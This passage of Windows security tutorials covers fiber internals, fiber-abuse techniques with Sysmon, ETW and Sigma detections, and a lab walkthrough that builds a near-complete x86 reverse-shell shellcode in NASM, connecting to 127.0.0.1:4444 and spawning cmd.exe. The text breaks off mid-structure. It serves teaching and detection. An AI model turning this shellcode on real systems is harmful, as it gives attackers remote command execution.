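mov     gs:[0x20], rcx                      ; NtTib.FiberData = target
; ... restore target registers, stack bounds, SEH chain, FLS pointer ...
mov     rsp, [rcx + FiberContextOff + Rsp]
jmp     qword [rcx + FiberContextOff + Rip]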

Figure (flow diagram): the six steps of SwitchToFiber, covering saving registers, saving SEH and stack bounds, updating NtTib.FiberData, restoring target registers, and jumping to the target fiber's saved RIP, all in user mode with no syscall. Caption: SwitchToFiber completes an entire stack-and-register swap inside KernelBase.dll without issuing a single syscall or generating a kernel ETW event.

7. Fiber Local Storage (FLS)

TLS is per-thread. During a fiber switch the TEB’s TLS array is not swapped, so two fibers sharing a thread share TLS — a classic source of corruption when porting thread-based libraries to fibers. FLS solves this: it is per-fiber, and SwitchToFiber updates TEB->FlsData to the incoming fiber’s slot array.

Function	Purpose
`FlsAlloc(PFLS_CALLBACK_FUNCTION)`	Allocate an FLS index; optional destructor callback
`FlsSetValue(DWORD, PVOID)`	Store a per-fiber value at the given index
`FlsGetValue(DWORD)`	Read the current fiber’s value at the given index
`FlsFree(DWORD)`	Release the index; callbacks fire for live fibers

The destructor callback pointers are kept process-wide in PEB->FlsCallback. They fire on fiber deletion and thread exit, and — as covered below — they are a known abuse target.

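#include <windows.h>
#include <stdio.h>

LPVOID g_mainFiber;
DWORD  g_flsIndex;

// FLS destructor: receives the slot value when a fiber is deleted,
// the thread exits, or the index is freed.
VOID WINAPI OnFlsDestroy(PVOID p) {
    if (p) HeapFree(GetProcessHeap(), 0, p);
}

VOID CALLBACK FiberA(LPVOID unused) {
    (void)unused;
    char *buf = (char*)HeapAlloc(GetProcessHeap(), 0, 32);
    if (buf) {
        lstrcpyA(buf, "fiber-A-private");
        FlsSetValue(g_flsIndex, buf);
    }
    SwitchToFiber(g_mainFiber);
    if (buf) printf("[A] still mine: %s\n", (char*)FlsGetValue(g_flsIndex));
    SwitchToFiber(g_mainFiber);   // never return from a fiber routine
}

int main(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    g_flsIndex  = FlsAlloc(OnFlsDestroy);
    if (g_mainFiber == NULL || g_flsIndex == FLS_OUT_OF_INDEXES) return 1;
    // ... create FiberA, FiberB, switch between them ...
    // Each fiber sees its own FlsGetValue(g_flsIndex) result.
    ConvertFiberToThread();
    return 0;
}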

Figure (hierarchy diagram): the PEB holds the FlsCallback destructor pointers; the TEB holds NtTib.FiberData, which points to the FIBER structure, and FlsData, which points to the per-fiber FLS slot array. Caption: FLS slot arrays are swapped per-fiber on every SwitchToFiber call, while PEB->FlsCallback holds process-wide destructor pointers that fire on fiber deletion, a known adversarial overwrite target.

8. Building a Round-Robin Cooperative Scheduler

Fibers shine when modeling cooperative pipelines: parsers, generators, state machines. A trivial scheduler is a dispatcher fiber that round-robins through worker fibers, each of which yields back via SwitchToFiber(g_mainFiber).

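#include <windows.h>
#include <stdio.h>

#define N 3
LPVOID g_workers[N];
LPVOID g_mainFiber;

VOID CALLBACK Worker(LPVOID id) {
    for (int i = 0; i < 4; ++i) {
        // Cast explicitly: ULONG_PTR is only 32 bits wide in x86 builds.
        printf("[worker %llu] step %d\n", (unsigned long long)(ULONG_PTR)id, i);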
        SwitchToFiber(g_mainFiber);   // yield
    }
    // Final yield — never return from a fiber routine.
    SwitchToFiber(g_mainFiber);
}

int main(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    for (ULONG_PTR i = 0; i < N; ++i)
        g_workers[i] = CreateFiber(0, Worker, (LPVOID)i);

    for (int round = 0; round < 4; ++round)
        for (int i = 0; i < N; ++i)
            SwitchToFiber(g_workers[i]);

    for (int i = 0; i < N; ++i) DeleteFiber(g_workers[i]);
    ConvertFiberToThread();
    return 0;
}

This is the same pattern Microsoft SQL Server used for its historical “lightweight pooling” / fiber mode — one OS thread, many SQL user contexts.
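For readers without a Windows build environment, the dispatch order of the scheduler above can be reproduced by analogy with Python generators, where `yield` plays the role of SwitchToFiber(g_mainFiber). This is only an illustration of cooperative round-robin scheduling: generators are not fibers, they have no separate native stack, and the names `worker` and `run_round_robin` are made up for this sketch.

```python
def worker(worker_id, steps, log):
    """One cooperative task: do a unit of work, then hand control back."""
    for step in range(steps):
        log.append(f"[worker {worker_id}] step {step}")
        yield  # cooperative yield back to the dispatcher


def run_round_robin(n_workers=3, steps=4):
    """Resume each task in turn until every task has finished."""
    log = []
    ready = [worker(i, steps, log) for i in range(n_workers)]
    while ready:
        for task in list(ready):      # iterate over a copy; we mutate `ready`
            try:
                next(task)            # resume the task until its next yield
            except StopIteration:
                ready.remove(task)    # task finished; drop it from rotation
    return log


if __name__ == "__main__":
    for line in run_round_robin():
        print(line)
```

As with the fiber version, nothing preempts a task: a worker that never yields would starve every other worker on the same dispatcher.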

9. Legitimate Use Cases and Pitfalls

Use Case	Reason
Coroutines / generators	Native stack switching with no `setjmp` tricks
Porting cooperative legacy code	UNIX `swapcontext`-style schedulers map cleanly
Database engines	SQL Server fiber mode for high-concurrency workloads
Game engines / scripting hosts	Per-script execution context with explicit yield

Pitfalls are sharp:

COM apartments have thread affinity, not fiber affinity. Initializing COM on one fiber and using it from another corrupts COM bookkeeping.
CRT and many MS libraries stash state in TLS. Switching fibers leaves that state behind, producing subtle corruption.
Critical sections record the thread as the owner — a different fiber on the same thread re-enters without blocking.
Stack-cookies and __try/__except rely on SEH chain integrity; SwitchToFiber handles this, but raw RtlInstallFunctionTableCallback on a fiber stack must use the fiber’s StackBase/StackLimit.

10. Common Attacker Techniques

Fibers are attractive to adversaries because the entire execution primitive lives in user mode — no NtCreateThread, no CreateRemoteThread, no kernel ETW event for the act of switching execution. The patterns below are documented in public threat-research literature; described conceptually here for detection engineers.

Technique	Description
In-process shellcode via `SwitchToFiber`	Allocate `PAGE_EXECUTE_READWRITE` memory, copy a payload, call `ConvertThreadToFiber` then `CreateFiber` with the payload as `lpStartAddress`, then `SwitchToFiber` — execution begins with no new thread
Fiber-based ROP staging	A fiber’s saved `CONTEXT` includes `RIP` and `RSP`; manipulating a `FIBER` struct’s context fields lets an attacker pivot the stack on `SwitchToFiber`
`PEB->FlsCallback` overwrite	Overwrite an entry in the process-wide FLS callback array; on the next `FlsFree` or fiber/thread teardown the attacker-controlled pointer is invoked with attacker-controlled data
TLS evasion via FLS	Hide per-task state in FLS slots that defensive tooling enumerating TLS will miss
API hiding via intrinsics	`GetCurrentFiber`/`GetFiberData` produce no IAT entry; static analysis missing `gs:[0x20]` reads will not see fiber-aware code

The base ATT&CK parent for fiber-based in-process execution is T1055 Process Injection; MITRE has not assigned a fiber-specific sub-technique, so the closest analogue is T1055.004 (APC) which shares the “queue execution to a thread’s user-mode context” model.

11. Defensive Strategies & Detection

There is no kernel event for SwitchToFiber. Detection must focus on the setup that precedes fiber-based execution (RWX allocation, suspicious entry points) and on memory forensics of fiber state at rest.

Sysmon coverage for the surrounding behavior:

Event ID	Signal
`1`	Process Create — establish baseline lineage
`8`	`CreateRemoteThread` — co-occurs with cross-process fiber staging
`10`	`ProcessAccess` — reflective loaders reading remote memory before fiber dispatch
`17`/`18`	Named-pipe create/connect — common multi-stage loader IPC
`25`	`ProcessTampering` — image-region tampering in a fiber host

ETW providers worth subscribing:

Microsoft-Windows-Threat-Intelligence — flags VirtualAlloc/VirtualProtect with PAGE_EXECUTE_*, the precursor to fiber shellcode staging.
Microsoft-Windows-Kernel-Process — does not see fiber switches but covers process/thread lifecycle.
A user-mode hook on NtAllocateVirtualMemory + NtProtectVirtualMemory adds an early pre-execution signal, although, unlike the kernel providers above, it can be unhooked or bypassed with direct syscalls.

Memory forensics indicators:

Walk TEB.NtTib.FiberData on every thread. Threads with HasFiberData == 1 in processes that have no business using fibers are immediately interesting.
Use Volatility malfind to surface private, executable, non-image-backed pages — the target of a fiber-staged payload.
Dump PEB->FlsCallback and verify every entry resolves to an expected module’s .text section.
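The callback-integrity check in the last item reduces to a range lookup once the pointers and module sections have been extracted by a forensic tool. The sketch below assumes that extraction has already happened: `pointers` is a list of callback addresses and `text_ranges` is a list of hypothetical (start, size, module_name) tuples for each loaded module's executable section, assumed not to overlap. The function name `find_unbacked` is illustrative.

```python
from bisect import bisect_right


def find_unbacked(pointers, text_ranges):
    """Return the pointers that fall outside every known code range."""
    ranges = sorted(text_ranges)              # sort by start address
    starts = [start for start, _, _ in ranges]
    suspicious = []
    for ptr in pointers:
        if ptr == 0:                          # empty slot, nothing to verify
            continue
        i = bisect_right(starts, ptr) - 1     # last range starting at or below ptr
        if i >= 0:
            start, size, _ = ranges[i]
            if start <= ptr < start + size:
                continue                      # backed by a module's code section
        suspicious.append(ptr)
    return suspicious


if __name__ == "__main__":
    # Hypothetical addresses for illustration only.
    modules = [
        (0x7FF800001000, 0x5000, "ntdll.dll"),
        (0x7FF900001000, 0x2000, "kernel32.dll"),
    ]
    callbacks = [0, 0x7FF800002000, 0x1F000010000]
    for ptr in find_unbacked(callbacks, modules):
        print(f"unbacked callback pointer: {ptr:#x}")
```

Any pointer this reports deserves a closer look at the protection and backing of the region it lands in.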

Sigma sketch for the cross-process precursor to fiber-based payload staging:

title: Suspicious ProcessAccess Preceding User-Mode Fiber Execution
id: 8f5c1d6e-3c7b-4b1f-9e1e-7e3e6e2b0a1f
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1fffff'   # PROCESS_ALL_ACCESS
      - '0x1f0fff'   # PROCESS_ALL_ACCESS value used before Windows Vista
    TargetImage|endswith:
      - '\explorer.exe'
      - '\svchost.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\SenseIR.exe'
  condition: selection and not filter_legit
level: high
tags:
  - attack.t1055
  - attack.t1106

Hardening:

SetProcessMitigationPolicy with ProcessDynamicCodePolicy (Arbitrary Code Guard) blocks creation of new executable pages, defeating fiber shellcode staging.
Control Flow Guard restricts indirect-call targets, narrowing SwitchToFiber and FLS-callback abuse to valid entry points.
HVCI / memory integrity prevents kernel-side tampering of FIBER structures via vulnerable drivers.
WDAC / AppLocker policies that deny PAGE_EXECUTE_* allocations on non-JIT processes raise the cost of any in-process execution primitive.

Figure (graph diagram): fiber abuse detection signals, with RWX allocation feeding the ETW Threat-Intelligence provider and Sysmon events, memory forensics walking PEB FlsCallback for non-text-section pointers, and ACG/CFG/HVCI as hardening mitigations. Caption: Because SwitchToFiber produces no kernel telemetry, defenders must pivot to pre-execution signals like RWX allocations, memory forensics on FiberData and FlsCallback, and ACG to deny executable page creation entirely.

12. Tools for Fiber Analysis

Tool	Description	Link
WinDbg	Dump `TEB`, walk `NtTib.FiberData`, inspect `FIBER.FiberContext`	`microsoft.com`
Process Hacker	Enumerate threads, inspect TEB, examine private RWX regions	`processhacker.sf.io`
Process Monitor	Capture `VirtualAlloc`/`VirtualProtect` sequences preceding fiber dispatch	`sysinternals.com`
Volatility 3	`windows.malfind`, TEB plugins, FLS callback inspection	`volatilityfoundation.org`
pykd / WinDbg JS	Scripted walks of `FIBER` chains across all threads	`githomelab.ru/pykd`
x64dbg	User-mode debugging of fiber-aware binaries; trace `gs:[0x20]` reads	`x64dbg.com`
Ghidra	Static analysis; recognize `GetCurrentFiber` intrinsic pattern	`ghidra-sre.org`
Sysmon	Surrounding telemetry (Events `1`, `8`, `10`, `25`)	`sysinternals.com`

A minimal WinDbg recipe to surface fiber-hosting threads in a captured process:

0:000> !teb
TEB at 000000abcd123000
    ...
    NtTib.FiberData:  0000020fabcde000
    ...
0:000> dt ntdll!_TEB @$teb HasFiberData
0:000> dq 0000020fabcde000 L40   ; raw FIBER bytes — layout version-dependent

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection	`T1055`	Memory scan for private RWX regions; ETW TI on `NtAllocateVirtualMemory`
Process Injection: Asynchronous Procedure Call	`T1055.004`	Closest published sub-technique to fiber-based in-process execution
Native API	`T1106`	API-call auditing of `CreateFiber`/`SwitchToFiber`/`FlsAlloc`
Reflective Code Loading	`T1620`	Image-load anomalies; fiber entry point in non-image-backed memory
Impair Defenses: Disable or Modify Tools	`T1562.001`	ETW/AMSI hook integrity checks; user-mode hook auditing

MITRE ATT&CK does not currently list a “Fiber Injection” sub-technique (current as of v16.1). Vendor research treats fiber-based execution as a variant of T1055; map accordingly.

Summary

A fiber is a user-mode cooperative thread invisible to the kernel scheduler — SwitchToFiber performs a stack and register swap entirely in KernelBase.dll with no syscall.
The TEB exposes the fiber state via NtTib.FiberData, HasFiberData, and FlsData; the FIBER structure itself is undocumented and version-dependent.
TLS is per-thread and is not swapped on a fiber switch; FLS is per-fiber and is swapped, with destructor callbacks tracked in PEB->FlsCallback.
Adversaries abuse fibers for in-process shellcode execution, ROP staging via the saved CONTEXT, and code execution via PEB->FlsCallback overwrites — none of which trigger thread-creation telemetry.
Detect via pre-execution signals (ETW TI on RWX allocations, Sysmon Event IDs 8/10/25), memory forensics on private executable regions and FlsCallback integrity, and hardening with ACG, CFG, and HVCI.

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.

1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint	Description
Position independent	Runs at an unknown address; all references are stack-relative or computed
Null-free	`\x00` terminates strings in many injection vectors and truncates the payload
No imports	API addresses must be resolved from loaded modules at runtime
Bad-char aware	`\x00`, `\x0a`, `\x0d` and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.

2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention	Stack Cleanup	Argument Order	Used By
`stdcall`	Callee (`ret N`)	Right-to-left	Win32 APIs (`CreateProcessA`, `WSASocketA`)
`cdecl`	Caller	Right-to-left	CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.

3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the TEB field at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. For 32-bit processes on Windows 7 through 11 the order is, in practice, [0] the executable → [1] ntdll.dll → [2] kernel32.dll, although this is an observed convention rather than a documented guarantee. Two FLink dereferences from the first entry land on kernel32's entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address — Two FLink dereferences from the module list head land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.
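
The two offsets the walk relies on (0x14 into PEB_LDR_DATA and 0x10 from InMemoryOrderLinks to DllBase) can be sanity-checked offline. The sketch below models the 32-bit layouts with ctypes, using 4-byte integers in place of pointers. The class names are illustrative, and only the leading fields of each structure are modelled, so treat it as a layout check rather than a full definition.

```python
import ctypes


class ListEntry32(ctypes.Structure):
    """LIST_ENTRY as laid out in a 32-bit process (two 4-byte pointers)."""
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]


class PebLdrData32(ctypes.Structure):
    """Leading fields of PEB_LDR_DATA (x86)."""
    _fields_ = [
        ("Length", ctypes.c_uint32),
        ("Initialized", ctypes.c_uint8),   # BOOLEAN, padded to 4 bytes
        ("SsHandle", ctypes.c_uint32),
        ("InLoadOrderModuleList", ListEntry32),
        ("InMemoryOrderModuleList", ListEntry32),
        ("InInitializationOrderModuleList", ListEntry32),
    ]


class LdrDataTableEntry32(ctypes.Structure):
    """Leading fields of LDR_DATA_TABLE_ENTRY (x86)."""
    _fields_ = [
        ("InLoadOrderLinks", ListEntry32),
        ("InMemoryOrderLinks", ListEntry32),
        ("InInitializationOrderLinks", ListEntry32),
        ("DllBase", ctypes.c_uint32),
        ("EntryPoint", ctypes.c_uint32),
        ("SizeOfImage", ctypes.c_uint32),
    ]


def dllbase_delta() -> int:
    """Distance from the InMemoryOrderLinks field to DllBase."""
    entry = LdrDataTableEntry32
    return entry.DllBase.offset - entry.InMemoryOrderLinks.offset


if __name__ == "__main__":
    print(hex(PebLdrData32.InMemoryOrderModuleList.offset))  # list head offset in Ldr
    print(hex(dllbase_delta()))                              # added after the FLink hops
```

The list pointers address the InMemoryOrderLinks field rather than the start of the entry, which is why the delta is 0x10 and not the 0x18 that WinDbg shows for DllBase.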

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
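.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash);
    ; on a match, branch to .match with edx still holding the name index
    inc    edx
    jmp    .next               ; a complete loop also bounds edx by NumberOfNames ([edi+0x18])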
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.
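
Analysts often precompute name hashes so that 32-bit constants found in a payload can be mapped back to API names. The sketch below assumes the rotate-right-by-13 additive hash seen in many public payloads. Real samples vary the rotation count, the case handling, and whether the module name is mixed in, so the function is one illustrative variant and the helper names are hypothetical.

```python
def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Assumed scheme: rotate the accumulator right by 13, then add each byte."""
    acc = 0
    for byte in name.encode("ascii"):
        acc = ror32(acc, 13)
        acc = (acc + byte) & 0xFFFFFFFF
    return acc


def build_lookup(names):
    """Map hash -> name so constants seen in a disassembly can be labelled."""
    return {ror13_hash(n): n for n in names}


if __name__ == "__main__":
    table = build_lookup(["LoadLibraryA", "GetProcAddress", "CreateProcessA"])
    for value, name in sorted(table.items()):
        print(f"0x{value:08x}  {name}")
```

Feeding the lookup with every export name of kernel32.dll and ws2_32.dll gives a table that can be matched against immediates in extracted shellcode.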

Diagram of PE export table structure showing how shellcode traverses from kernel32 base address through NT headers to the export directory and its three parallel arrays to resolve GetProcAddress — Shellcode walks three parallel export arrays — names, ordinals, and functions — to translate a name hash into the final virtual address of GetProcAddress.
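
The same three-array lookup can be reproduced offline when triaging a memory dump. The following is a minimal sketch that assumes a 32-bit image already mapped in memory, so that an RVA equals a buffer offset. The synthetic image built by build_demo_image is a made-up fixture for illustration, not a real DLL.

```python
import struct


def u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def cstring(buf, off):
    """Read a NUL-terminated byte string starting at `off`."""
    return bytes(buf[off:buf.index(b"\x00", off)])


def resolve_export(image, wanted: bytes):
    """Return the function RVA for `wanted`, or None if it is not exported by name."""
    nt = u32(image, 0x3C)                # e_lfanew
    exp = u32(image, nt + 0x78)          # export directory RVA (PE32)
    count = u32(image, exp + 0x18)       # NumberOfNames
    funcs = u32(image, exp + 0x1C)       # AddressOfFunctions
    names = u32(image, exp + 0x20)       # AddressOfNames
    ords = u32(image, exp + 0x24)        # AddressOfNameOrdinals
    for i in range(count):
        if cstring(image, u32(image, names + 4 * i)) == wanted:
            index = u16(image, ords + 2 * i)      # name index -> function index
            return u32(image, funcs + 4 * index)
    return None


def build_demo_image() -> bytes:
    """Hypothetical fixture: just enough header fields for the lookup to run."""
    img = bytearray(0x300)
    struct.pack_into("<I", img, 0x3C, 0x40)
    struct.pack_into("<I", img, 0x40 + 0x78, 0x100)
    struct.pack_into("<I", img, 0x100 + 0x18, 2)
    struct.pack_into("<I", img, 0x100 + 0x1C, 0x140)
    struct.pack_into("<I", img, 0x100 + 0x20, 0x160)
    struct.pack_into("<I", img, 0x100 + 0x24, 0x180)
    struct.pack_into("<3I", img, 0x140, 0x1111, 0x2222, 0x3333)  # function RVAs
    struct.pack_into("<2I", img, 0x160, 0x200, 0x210)            # name RVAs
    struct.pack_into("<2H", img, 0x180, 2, 0)                    # ordinal indexes
    img[0x200:0x206] = b"Alpha\x00"
    img[0x210:0x215] = b"Beta\x00"
    return bytes(img)
```

The fixture deliberately maps the first name to function index 2, which shows why the ordinal array cannot be skipped: the name index and the function index are not the same number.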

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    xor    ecx, ecx
    push   ecx                 ; NUL terminator ("LoadLibraryA" is exactly 12 bytes)
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

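Each API name is pushed as little-endian dwords, last chunk first, so it reads correctly in memory; a name whose length is a multiple of four also needs a zero dword pushed before it as the terminator. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it once for each API it needs.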
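
When reading a disassembly, the push immediates have to be turned back into text. The sketch below converts in both directions so the constants in this section can be checked by hand. The function names are hypothetical, and the encoder only handles strings whose length is a multiple of four.

```python
import struct


def from_push_dwords(dwords):
    """Recover the string built by pushing `dwords` in the given order."""
    # The last push ends up at the lowest address, so reverse before joining.
    data = b"".join(struct.pack("<I", d) for d in reversed(dwords))
    return data.split(b"\x00", 1)[0].decode("ascii")


def to_push_dwords(text: str):
    """Return the immediates in push order (last four characters first)."""
    data = text.encode("ascii")
    if len(data) % 4:
        raise ValueError("this sketch only handles lengths that are multiples of 4")
    chunks = [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]
    return chunks[::-1]


if __name__ == "__main__":
    print([hex(d) for d in to_push_dwords("LoadLibraryA")])
    print(repr(from_push_dwords([0x00000000, 0x6578652E, 0x646D6320])))
```

The decoder stops at the first zero byte, which mirrors how the API itself will read the string.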

6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any other Winsock call. Reserve the 400-byte WSADATA on the stack and pass a pointer; Winsock fills it in. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored in network byte order (big-endian); read as little-endian dwords, 127.0.0.1 becomes 0x0100007f and the packed family/port pair for port 4444 becomes 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>
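
The two SOCKADDR_IN constants are easy to get wrong by hand, so it helps to derive them. The sketch below packs the fields the way they sit in memory and reads them back as little-endian dwords. The helper names are hypothetical, and the bad-byte set is the same assumption used by the scanner later in this tutorial.

```python
import socket
import struct


def sockaddr_in_dwords(ip: str, port: int):
    """Return (family_port_dword, address_dword) as they would appear as push immediates."""
    # sin_family is a host-order (little-endian) u16, sin_port is big-endian.
    family_port = struct.pack("<H", socket.AF_INET) + struct.pack(">H", port)
    address = socket.inet_aton(ip)  # four bytes, already in network order
    return struct.unpack("<I", family_port)[0], struct.unpack("<I", address)[0]


def bad_bytes_in(dword: int, bad=frozenset({0x00, 0x0A, 0x0D})):
    """List the bytes of a 32-bit immediate that fall in the bad-character set."""
    return [b for b in struct.pack("<I", dword) if b in bad]


if __name__ == "__main__":
    fp, addr = sockaddr_in_dwords("127.0.0.1", 4444)
    print(hex(fp), hex(addr))
    print(bad_bytes_in(fp), bad_bytes_in(addr))
```

Both lab constants contain zero bytes (the high byte of AF_INET and the middle of the loopback address), which is the situation the re-encoding row in the bad-character table refers to.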

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket
    push   edi                 ; hStdOutput = socket
    push   edi                 ; hStdInput  = socket
    times 2 push eax           ; lpReserved2, then cbReserved2:wShowWindow
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES (offset 0x2C)
    times 10 push eax          ; dwFillAttribute .. lpReserved (10 dwords)
    push   0x44                ; cb = sizeof(STARTUPINFOA)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>

Sequential flowchart of the full reverse shell execution chain from PEB walk through export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and final CreateProcessA call spawning cmd.exe — Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.
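
Because the structure is built one dword at a time, the field offsets decide how many zero dwords go between the meaningful values. The sketch below models the 32-bit STARTUPINFOA layout with ctypes, with 4-byte integers standing in for pointers and handles. The class name is illustrative.

```python
import ctypes

U32 = ctypes.c_uint32  # stands in for DWORD, 32-bit pointers, and handles
U16 = ctypes.c_uint16


class StartupInfoA32(ctypes.Structure):
    """STARTUPINFOA as laid out in a 32-bit process."""
    _fields_ = [
        ("cb", U32), ("lpReserved", U32), ("lpDesktop", U32), ("lpTitle", U32),
        ("dwX", U32), ("dwY", U32), ("dwXSize", U32), ("dwYSize", U32),
        ("dwXCountChars", U32), ("dwYCountChars", U32),
        ("dwFillAttribute", U32), ("dwFlags", U32),
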